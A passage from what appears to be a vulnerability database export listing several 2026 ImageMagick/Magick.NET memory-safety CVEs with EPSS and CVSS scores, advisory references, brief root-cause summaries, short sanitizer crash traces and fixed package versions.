reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-25986
reference_id
reference_type
scores
0
value 0.00026
scoring_system epss
scoring_elements 0.07292
published_at 2026-04-21T12:55:00Z
1
value 0.00026
scoring_system epss
scoring_elements 0.07168
published_at 2026-04-18T12:55:00Z
2
value 0.00026
scoring_system epss
scoring_elements 0.07174
published_at 2026-04-16T12:55:00Z
3
value 0.00026
scoring_system epss
scoring_elements 0.07243
published_at 2026-04-13T12:55:00Z
4
value 0.00026
scoring_system epss
scoring_elements 0.07252
published_at 2026-04-12T12:55:00Z
5
value 0.00026
scoring_system epss
scoring_elements 0.07266
published_at 2026-04-11T12:55:00Z
6
value 0.00026
scoring_system epss
scoring_elements 0.07269
published_at 2026-04-09T12:55:00Z
7
value 0.00026
scoring_system epss
scoring_elements 0.07242
published_at 2026-04-08T12:55:00Z
8
value 0.00026
scoring_system epss
scoring_elements 0.07208
published_at 2026-04-04T12:55:00Z
9
value 0.00026
scoring_system epss
scoring_elements 0.07188
published_at 2026-04-07T12:55:00Z
10
value 0.00061
scoring_system epss
scoring_elements 0.19294
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-25986
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25986
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25986
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mqfc-82jx-3mr2
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:06:36Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mqfc-82jx-3mr2
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-25986
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-25986
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442111
reference_id 2442111
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442111
9
reference_url https://github.com/advisories/GHSA-mqfc-82jx-3mr2
reference_id GHSA-mqfc-82jx-3mr2
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-mqfc-82jx-3mr2
10
reference_url https://usn.ubuntu.com/8069-1/
reference_id USN-8069-1
reference_type
scores
url https://usn.ubuntu.com/8069-1/
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-25986, GHSA-mqfc-82jx-3mr2
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vpdn-g1k9-1kdn
57
url VCID-x44m-x33k-hydn
vulnerability_id VCID-x44m-x33k-hydn
summary 
ImageMagick: Heap-based Buffer Overflow in GetPixelIndex due to metadata-cache desynchronization
`OpenPixelCache`  updates image channel metadata **before** attempting pixel cache memory allocation. When both memory and disk allocation fail a heap-buffer-overflow read in occurs in any writer that calls `GetPixelIndex`.
references
0
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 3.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:L
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
1
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 3.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:L
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
2
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-gq5v-qf8q-fp77
reference_id
reference_type
scores
0
value 3.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:L
1
value LOW
scoring_system cvssv3.1_qr
scoring_elements
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-gq5v-qf8q-fp77
3
reference_url https://github.com/advisories/GHSA-gq5v-qf8q-fp77
reference_id GHSA-gq5v-qf8q-fp77
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-gq5v-qf8q-fp77
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases GHSA-gq5v-qf8q-fp77
risk_score 1.5
exploitability 0.5
weighted_severity 3.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-x44m-x33k-hydn
58
url VCID-x8c6-9pse-xkc8
vulnerability_id VCID-x8c6-9pse-xkc8
summary 
ImageMagick: Integer overflow in DIB coder can result in out of bounds read or write
An integer overflow in DIB coder can result in out of bounds read or write
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28693.json
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28693.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-28693
reference_id
reference_type
scores
0
value 0.00059
scoring_system epss
scoring_elements 0.18648
published_at 2026-04-09T12:55:00Z
1
value 0.00059
scoring_system epss
scoring_elements 0.18595
published_at 2026-04-08T12:55:00Z
2
value 0.00059
scoring_system epss
scoring_elements 0.18515
published_at 2026-04-07T12:55:00Z
3
value 0.00059
scoring_system epss
scoring_elements 0.18798
published_at 2026-04-04T12:55:00Z
4
value 0.00059
scoring_system epss
scoring_elements 0.18744
published_at 2026-04-02T12:55:00Z
5
value 0.00065
scoring_system epss
scoring_elements 0.20029
published_at 2026-04-21T12:55:00Z
6
value 0.00065
scoring_system epss
scoring_elements 0.20148
published_at 2026-04-11T12:55:00Z
7
value 0.00065
scoring_system epss
scoring_elements 0.20102
published_at 2026-04-12T12:55:00Z
8
value 0.00065
scoring_system epss
scoring_elements 0.20044
published_at 2026-04-13T12:55:00Z
9
value 0.00065
scoring_system epss
scoring_elements 0.20026
published_at 2026-04-16T12:55:00Z
10
value 0.00065
scoring_system epss
scoring_elements 0.2003
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-28693
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28693
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28693
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-hffp-q43q-qq76
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-10T15:57:44Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-hffp-q43q-qq76
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-28693
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-28693
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2445888
reference_id 2445888
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2445888
9
reference_url https://github.com/advisories/GHSA-hffp-q43q-qq76
reference_id GHSA-hffp-q43q-qq76
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-hffp-q43q-qq76
10
reference_url https://access.redhat.com/errata/RHSA-2026:6713
reference_id RHSA-2026:6713
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6713
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-jc5m-7rvc-2qg6
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
aliases CVE-2026-28693, GHSA-hffp-q43q-qq76
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-x8c6-9pse-xkc8
59
url VCID-xbsu-ac6g-53fn
vulnerability_id VCID-xbsu-ac6g-53fn
summary 
ImageMagick has heap-buffer-overflow via signed integer overflow in WriteUHDRImage when writing UHDR images with large dimensions
`WriteUHDRImage` in `coders/uhdr.c` uses `int` arithmetic to compute the pixel buffer size. When image dimensions are large, the multiplication overflows 32-bit `int`, causing an undersized heap allocation followed by an out-of-bounds write. This can crash the process or potentially lead to an out of bounds heap write.
```
==1575126==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fc382ef3820 at pc 0x5560d31f229f bp 0x7ffe865f9530 sp 0x7ffe865f9520
WRITE of size 8 at 0x7fc382ef3820 thread T0
    #0 0x5560d31f229e in WriteUHDRImage coders/uhdr.c:807
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25794.json
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25794.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-25794
reference_id
reference_type
scores
0
value 0.00019
scoring_system epss
scoring_elements 0.04924
published_at 2026-04-21T12:55:00Z
1
value 0.00058
scoring_system epss
scoring_elements 0.17955
published_at 2026-04-16T12:55:00Z
2
value 0.00058
scoring_system epss
scoring_elements 0.18013
published_at 2026-04-13T12:55:00Z
3
value 0.00058
scoring_system epss
scoring_elements 0.18063
published_at 2026-04-12T12:55:00Z
4
value 0.00058
scoring_system epss
scoring_elements 0.18107
published_at 2026-04-11T12:55:00Z
5
value 0.00058
scoring_system epss
scoring_elements 0.18098
published_at 2026-04-09T12:55:00Z
6
value 0.00058
scoring_system epss
scoring_elements 0.18038
published_at 2026-04-08T12:55:00Z
7
value 0.00058
scoring_system epss
scoring_elements 0.17952
published_at 2026-04-07T12:55:00Z
8
value 0.00058
scoring_system epss
scoring_elements 0.18197
published_at 2026-04-02T12:55:00Z
9
value 0.00058
scoring_system epss
scoring_elements 0.18251
published_at 2026-04-04T12:55:00Z
10
value 0.00058
scoring_system epss
scoring_elements 0.17966
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-25794
2
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
3
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
4
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
5
reference_url https://github.com/ImageMagick/ImageMagick/commit/ffe589df5ff8ce1433daa4ccb0d2a9fadfbe30ed
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/ffe589df5ff8ce1433daa4ccb0d2a9fadfbe30ed
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-vhqj-f5cj-9x8h
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T15:04:46Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-vhqj-f5cj-9x8h
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-25794
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-25794
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442110
reference_id 2442110
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442110
9
reference_url https://github.com/advisories/GHSA-vhqj-f5cj-9x8h
reference_id GHSA-vhqj-f5cj-9x8h
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-vhqj-f5cj-9x8h
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-25794, GHSA-vhqj-f5cj-9x8h
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-xbsu-ac6g-53fn
60
url VCID-y4hn-6bv6-jugw
vulnerability_id VCID-y4hn-6bv6-jugw
summary 
ImageMagick: MSL attribute stack buffer overflow leads to out of bounds write.
A stack buffer overflow occurs when processing the an attribute in msl.c. A long value overflows a fixed-size stack buffer, leading to memory corruption.

```
=================================================================
==278522==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffdb8c76984 at pc 0x55a4bf16f507 bp 0x7ffdb8c75bc0 sp 0x7ffdb8c75bb0
WRITE of size 1 at 0x7ffdb8c76984 thread T0
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25968.json
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25968.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-25968
reference_id
reference_type
scores
0
value 0.00061
scoring_system epss
scoring_elements 0.19079
published_at 2026-04-21T12:55:00Z
1
value 0.00061
scoring_system epss
scoring_elements 0.1907
published_at 2026-04-18T12:55:00Z
2
value 0.00061
scoring_system epss
scoring_elements 0.19059
published_at 2026-04-16T12:55:00Z
3
value 0.00061
scoring_system epss
scoring_elements 0.191
published_at 2026-04-13T12:55:00Z
4
value 0.00061
scoring_system epss
scoring_elements 0.19155
published_at 2026-04-12T12:55:00Z
5
value 0.00061
scoring_system epss
scoring_elements 0.19201
published_at 2026-04-11T12:55:00Z
6
value 0.00061
scoring_system epss
scoring_elements 0.19194
published_at 2026-04-09T12:55:00Z
7
value 0.00061
scoring_system epss
scoring_elements 0.19141
published_at 2026-04-08T12:55:00Z
8
value 0.00061
scoring_system epss
scoring_elements 0.19061
published_at 2026-04-07T12:55:00Z
9
value 0.00061
scoring_system epss
scoring_elements 0.19294
published_at 2026-04-02T12:55:00Z
10
value 0.00061
scoring_system epss
scoring_elements 0.19346
published_at 2026-04-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-25968
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25968
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25968
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-3mwp-xqp2-q6ph
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-3mwp-xqp2-q6ph
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-25968
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-25968
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442125
reference_id 2442125
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442125
9
reference_url https://github.com/advisories/GHSA-3mwp-xqp2-q6ph
reference_id GHSA-3mwp-xqp2-q6ph
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-3mwp-xqp2-q6ph
10
reference_url https://usn.ubuntu.com/8069-1/
reference_id USN-8069-1
reference_type
scores
url https://usn.ubuntu.com/8069-1/
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-25968, GHSA-3mwp-xqp2-q6ph
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-y4hn-6bv6-jugw
61
url VCID-y58b-be93-hbfd
vulnerability_id VCID-y58b-be93-hbfd
summary 
ImageMagick: Write heap-buffer-overflow in PCL encoder via undersized output buffer
A heap-buffer-overflow vulnerability exists in the PCL encode due to an undersized output buffer allocation.

```
WRITE of size 1 at 0x7e79f91f31a0 thread T0
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28686.json
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28686.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-28686
reference_id
reference_type
scores
0
value 0.00017
scoring_system epss
scoring_elements 0.04189
published_at 2026-04-09T12:55:00Z
1
value 0.00017
scoring_system epss
scoring_elements 0.04175
published_at 2026-04-08T12:55:00Z
2
value 0.00017
scoring_system epss
scoring_elements 0.04143
published_at 2026-04-07T12:55:00Z
3
value 0.00017
scoring_system epss
scoring_elements 0.04127
published_at 2026-04-04T12:55:00Z
4
value 0.00017
scoring_system epss
scoring_elements 0.04109
published_at 2026-04-02T12:55:00Z
5
value 0.00019
scoring_system epss
scoring_elements 0.04944
published_at 2026-04-21T12:55:00Z
6
value 0.00019
scoring_system epss
scoring_elements 0.04881
published_at 2026-04-11T12:55:00Z
7
value 0.00019
scoring_system epss
scoring_elements 0.04861
published_at 2026-04-12T12:55:00Z
8
value 0.00019
scoring_system epss
scoring_elements 0.04841
published_at 2026-04-13T12:55:00Z
9
value 0.00019
scoring_system epss
scoring_elements 0.0479
published_at 2026-04-16T12:55:00Z
10
value 0.00019
scoring_system epss
scoring_elements 0.04799
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-28686
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28686
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28686
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-467j-76j7-5885
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T14:24:19Z/
